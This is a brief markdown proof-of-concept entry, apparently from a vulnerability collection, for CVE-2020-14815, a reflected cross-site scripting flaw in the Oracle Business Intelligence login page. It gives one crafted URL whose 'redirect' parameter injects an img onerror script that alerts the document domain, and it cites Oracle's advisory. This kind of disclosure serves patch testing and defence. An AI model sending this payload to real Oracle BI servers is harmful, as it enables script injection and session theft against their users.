CVE-2020-14815 Oracle Business Intelligence XSS.md

403 B / 2021-05-21 09:14:38

    # CVE-2020-14815 Oracle Business Intelligence XSS

CVE-2020-14815 Oracle Business Intelligence XSS

PoC：

```
https://target[.]com/bi-security-login/login.jsp?msi=false&redirect="><img/src/onerror%3dalert(document.domain)>
```

![](media/16097303376686/16097303534400.jpg)


ref：

https://www.oracle.com/security-alerts/cpuoct2020.html

https://twitter.com/HackerOn2Wheels/status/1326927875279380480